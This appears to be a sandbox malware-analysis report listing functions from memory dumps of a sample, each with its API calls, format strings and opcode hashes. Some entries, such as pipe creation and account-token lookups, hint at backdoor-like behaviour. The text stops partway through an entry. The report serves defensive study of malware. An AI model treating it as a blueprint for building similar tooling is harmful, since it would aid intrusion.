Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno$_callnewhfreerealloc
String ID:
API String ID: 74200508-0
Opcode ID: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
Instruction ID: 0ee02cd8ee7238550fec83e67c75b7b005c73ab36e520dbd3fdc87c989425de7
Opcode Fuzzy Hash: fd4b1ce187cf5d2c7b3c7d1d5f2f485ec143d87fcb2d796d9dd721ce5a89571b
Instruction Fuzzy Hash: 8DC1A334718F044BEB18FBBC999567D72D6FB98201F14453E944BCB291EE38DC068B8A

Function 036A263B Relevance: 7.8, APIs: 6, Instructions: 264stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 036A2675
strchr.LIBCMT ref: 036A2693
malloc.LIBCMT ref: 036A26AB
malloc.LIBCMT ref: 036A26B8
free.LIBCMT ref: 036A28A2
free.LIBCMT ref: 036A28AA

Part of subcall function 036AE68B: _errno.LIBCMT ref: 036AE6AB

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: freemallocstrchr$_errno
String ID:
API String ID: 4025974267-0
Opcode ID: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
Instruction ID: 688a0972a47937454d82906f0ed840908ef7e440b7a9a9c21afd03832c5d5531
Opcode Fuzzy Hash: f35e4bf4a30ec4413237561f10dac7197b8990473e0b46e11b580f4fb44e5963
Instruction Fuzzy Hash: C4711424628F9C4BDB6AEB2C84103F6B3D1FF99306F04056DD58AC7251DA35CD8B8B85

Function 036A0ADB Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 036A5433: malloc.LIBCMT ref: 036A544F

Part of subcall function 036AFA67: _errno.LIBCMT ref: 036AF9BE
Part of subcall function 036AFA67: _invalid_parameter_noinfo.LIBCMT ref: 036AF9C9

fseek.LIBCMT ref: 036A0B77

Part of subcall function 036B02EB: _errno.LIBCMT ref: 036B0313
Part of subcall function 036B02EB: _invalid_parameter_noinfo.LIBCMT ref: 036B031E

_ftelli64.LIBCMT ref: 036A0B7F

Part of subcall function 036B035F: _errno.LIBCMT ref: 036B037D
Part of subcall function 036B035F: _invalid_parameter_noinfo.LIBCMT ref: 036B0388

fseek.LIBCMT ref: 036A0B8F

Part of subcall function 036B02EB: _fseek_nolock.LIBCMT ref: 036B033C

malloc.LIBCMT ref: 036A0BCF

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

fclose.LIBCMT ref: 036A0C8C

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
Instruction ID: f6308b0d4fc617c70e4eb200ce6a0f6615b9a63f517b8a094f53d322ab67c170
Opcode Fuzzy Hash: f1c4e02295faa99f8843714657dd5281141177bf23df19fa39898597ddf49910
Instruction Fuzzy Hash: 5351B035728F084FD749EB2CD49467E72D6FB89600B50466ED48FC7295EE389D028B8A

Function 036B978F Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 036B97BC

Part of subcall function 036B329F: _FF_MSGBANNER.LIBCMT ref: 036B32BC
Part of subcall function 036B329F: _NMSG_WRITE.LIBCMT ref: 036B32C6

_lock.LIBCMT ref: 036B97CF
_lock.LIBCMT ref: 036B982A
_calloc_crt.LIBCMT ref: 036B98E1

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
Instruction ID: 2784a8c278ed62a2172609c95b87ddfff353ee9886dcb30c058d0c35272084a5
Opcode Fuzzy Hash: b1e94c722dda090378a8e761eed7513b06593d91ccd6790d0d4411b736f80c7c
Instruction Fuzzy Hash: 4651D270528B098FD718DF18D8852A6B7E4FB48310F19469ED98EC7365DB78D8828FC6

Function 03694937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03694981

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

malloc.LIBCMT ref: 0369498C

Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE75F
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE764

free.LIBCMT ref: 03694A73
free.LIBCMT ref: 03694A7B
free.LIBCMT ref: 03694A87
free.LIBCMT ref: 03694A94

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
Instruction ID: 0990112b98fd32034136361dcb49519e84b668839e89c1997de18b9bc30a9ce2
Opcode Fuzzy Hash: 9dd44889f23309e2c133c4e883ac3d7c03cf28f4ebc62bcd805b5d39935d1e2d
Instruction Fuzzy Hash: 1241263530CF0D4BAF2AEA2E594213A73DDEB96254714052ED88BC3316EE60D80787C9

Function 036B00A4 Relevance: 7.7, APIs: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 036AFF9E
memcpy_s.LIBCMT ref: 036B0063
_fileno.LIBCMT ref: 036B00CE

Part of subcall function 036B4E9B: _errno.LIBCMT ref: 036B4EA4
Part of subcall function 036B4E9B: _invalid_parameter_noinfo.LIBCMT ref: 036B4EAF

Part of subcall function 036B637F: __doserrno.LIBCMT ref: 036B63B9
Part of subcall function 036B637F: _errno.LIBCMT ref: 036B63C0

_filbuf.LIBCMT ref: 036B00FC
_errno.LIBCMT ref: 036B014C

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
String ID:
API String ID: 1812282339-0
Opcode ID: 1d80507bd446d673e38c574efff92c11e3e4791c727a6c64fa90c2c2373988e9
Instruction ID: 5217265846ecb2725de7db63911db95b78581f3c94474d7986fea31cf5cd0ac7
Opcode Fuzzy Hash: 1d80507bd446d673e38c574efff92c11e3e4791c727a6c64fa90c2c2373988e9
Instruction Fuzzy Hash: D441963132CF094BD72CEA6D594517ABBE2E795621B28032ED49AC3395DF20D8D34BC6

Function 036B17E3 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 036B1800

Part of subcall function 036B4E9B: _errno.LIBCMT ref: 036B4EA4
Part of subcall function 036B4E9B: _invalid_parameter_noinfo.LIBCMT ref: 036B4EAF

_errno.LIBCMT ref: 036B1810

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_errno.LIBCMT ref: 036B182C
_isatty.LIBCMT ref: 036B188D
_getbuf.LIBCMT ref: 036B1899

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
Instruction ID: 5fad5a242722c06e11b08e247f275a007b62a69c0e6fba2e7239d56e474f20a1
Opcode Fuzzy Hash: c35e8c2de9f02937b40d8dcb44627bb11330896f7d068decc206105344bae12a
Instruction Fuzzy Hash: 1541E331214B089FCB58EF28C5A17A577F1FB4A310B184699D85ACF396E638C8C2CF81

Function 036A8667 Relevance: 7.6, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 036A8696

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

_snprintf.LIBCMT ref: 036A86AE

Part of subcall function 036AEA83: _errno.LIBCMT ref: 036AEABA
Part of subcall function 036AEA83: _invalid_parameter_noinfo.LIBCMT ref: 036AEAC5

free.LIBCMT ref: 036A86C5

Part of subcall function 036AE68B: _errno.LIBCMT ref: 036AE6AB

malloc.LIBCMT ref: 036A8715
_snprintf.LIBCMT ref: 036A872D
free.LIBCMT ref: 036A8755

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
String ID:
API String ID: 761449704-0
Opcode ID: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
Instruction ID: c083f2ae38edeb7a061678f5a81c813274e6bf0dabacc9e31c469bfbd0de6a1e
Opcode Fuzzy Hash: faf2166294d0965833cb84c6e7fe882f3c5ed13ceeefabe40a4c11aee224dca5
Instruction Fuzzy Hash: F731C12470CE5C0F9B58EB2C68253B87BD2E78931075896ADD0CEC3356DE34DC528B85

Function 03AA00F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
Instruction ID: 1e3dbeac6762174b757fcd400743d1ed13566fd809cd9d22e5709d955fa2bb2b
Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
Instruction Fuzzy Hash: E151DF6BB04F409AEF14EB79C5406ED6760F795B88F859117CE492B714EF38C549C740

Function 03AB062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB0664

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_invalid_parameter_noinfo.LIBCMT ref: 03AB066F
_flush.LIBCMT ref: 03AB0721
_fileno.LIBCMT ref: 03AB0742
_flsbuf.LIBCMT ref: 03AB0785

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
Instruction ID: 8490ac4845a03586ffa834d6207840fc753032b41e42c66fc327d6efce7c36a4
Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
Instruction Fuzzy Hash: 40310A35300B408BDA28DF2756542DBF679B795FE0F1C862A9E564BB93D77CC0828640

Function 03A954F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A9553A

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

malloc.LIBCMT ref: 03A95545

Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF318
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF31D

free.LIBCMT ref: 03A9562C
free.LIBCMT ref: 03A95634
free.LIBCMT ref: 03A95640
free.LIBCMT ref: 03A9564D

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
Instruction ID: e756228c5ab060b94d97195212c17df1217841def047aca77a88df5563abf6e6
Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
Instruction Fuzzy Hash: CB31C52671478546EF1BDB6BA81062AA799F796BC8F4D402BCE469B700EE3CC50AC300

Function 03AA2D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03AA31F4: strchr.LIBCMT ref: 03AA322E
Part of subcall function 03AA31F4: strchr.LIBCMT ref: 03AA324C
Part of subcall function 03AA31F4: malloc.LIBCMT ref: 03AA3264
Part of subcall function 03AA31F4: malloc.LIBCMT ref: 03AA3271
Part of subcall function 03AA31F4: rand.LIBCMT ref: 03AA333D

strchr.LIBCMT ref: 03AA2DD6
_snprintf.LIBCMT ref: 03AA2E0C

Part of subcall function 03AAF63C: _errno.LIBCMT ref: 03AAF673
Part of subcall function 03AAF63C: _invalid_parameter_noinfo.LIBCMT ref: 03AAF67E

_snprintf.LIBCMT ref: 03AA2E23

Strings

%s&%s, xrefs: 03AA2E1C
?%s, xrefs: 03AA2E05

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
String ID: %s&%s$?%s
API String ID: 1095232423-1750478248
Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
Instruction ID: 7a2b9cc3b935d2c9316b8026fc4035d5eec8bb76d1cff4a04bd5d2547600f8e2
Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
Instruction Fuzzy Hash: 87417E67214FC091DA25DF2ED6452E8A3B0FF98B95F085A12DF895BB20EF34D1B28340

Function 03ABAC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03ABACFA
_isleadbyte_l.LIBCMT ref: 03ABAD2A
MultiByteToWideChar.KERNEL32 ref: 03ABAD69
MultiByteToWideChar.KERNEL32 ref: 03ABADB7
_errno.LIBCMT ref: 03ABADC1

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
Instruction ID: 829daefbcb48bc846564641c6d7e833bf4bc01dd5b684cd5a3680c5696b17220
Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
Instruction Fuzzy Hash: AD3180323147808ADB60CF19E5907A9BB79FB85FD5F18422BEB8957B66DB38C451C700

Function 0369F0AB Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0369F0CC

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

free.LIBCMT ref: 0369F107
fwrite.LIBCMT ref: 0369F148
fclose.LIBCMT ref: 0369F150
free.LIBCMT ref: 0369F15D

Part of subcall function 036AE68B: _errno.LIBCMT ref: 036AE6AB

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 847eb6b7486c9ee4865d8d7c518a95bf0648219dea0f29af020a53809fe39c03
Instruction ID: 20d676b5c21c2099b24a7f0d7d2577e2b0d5771109e3a1e209730acb9f8e13d4
Opcode Fuzzy Hash: 847eb6b7486c9ee4865d8d7c518a95bf0648219dea0f29af020a53809fe39c03
Instruction Fuzzy Hash: 76216D34728F088BDB84F72DC55426E76D2FB88250F550A6EA54FCB294DE38DD018B8A

Function 036B9A33 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B9A44

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__doserrno.LIBCMT ref: 036B9A3C

Part of subcall function 036B10EF: _getptd_noexit.LIBCMT ref: 036B10F3

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction ID: 650736e6112e3535293d3261897406b67088dc957e3f8bc0cdbea44552adc3c7
Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction Fuzzy Hash: 5FF02831524A498ED308FB65C8A03E436F2FF42321F544258C619CF1E2D7B844C18F11

Function 03ABA5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03ABA5FD

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

__doserrno.LIBCMT ref: 03ABA5F5

Part of subcall function 03AB1CA8: _getptd_noexit.LIBCMT ref: 03AB1CAC

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction ID: 2879447cfefadd43fa4325f3ee43e9f6550652bd2fb080e541bec16adfb0b925
Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction Fuzzy Hash: A0F096B6711B8449DF0AEB28C9B03AC66B9AB51B72FA54707C5390F3D2DB3C40558721

Function 03A9D83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

Strings

%s!%s, xrefs: 03A9D9EB

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID: %s!%s
API String ID: 0-2935588013
Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
Instruction ID: 3e8e5577b44b6b50c77660b6219a7a393e1c30e6f8cdc371eea7893c655299bf
Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
Instruction Fuzzy Hash: AD515E7A204740C6EF24EF66D0406A973A5F389F94F488427DF8E6BB58DB38C982C714

Function 03AA2818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 03AA28A3
GetStartupInfoA.KERNEL32 ref: 03AA28AD
Sleep.KERNEL32 ref: 03AA28F4

Part of subcall function 03AA48D8: GetTickCount.KERNEL32 ref: 03AA48F1
Part of subcall function 03AA48D8: GetTickCount.KERNEL32 ref: 03AA4932

Strings

h, xrefs: 03AA284D

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$CreateInfoPipeSleepStartup
String ID: h
API String ID: 1809008225-2439710439
Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
Instruction ID: 98d3a92b6fb5b0481e15180b328db86cefabd7c07f35af632f0613b0889af615
Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
Instruction Fuzzy Hash: F6417737604B888AE710CF65E84078EB7B5F389798F10421AEE9C57B68DF78D646CB40

Function 03AAE1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 03AAE26D
LookupAccountSidA.ADVAPI32 ref: 03AAE2B2
_snprintf.LIBCMT ref: 03AAE2DA

Strings

%s\%s, xrefs: 03AAE2C8

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AccountInformationLookupToken_snprintf
String ID: %s\%s
API String ID: 2107350476-4073750446
Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
Instruction ID: db2cb3ef0520cd380d154edeb26462c5959d6ccf91a2d42a86b1926e6365639b
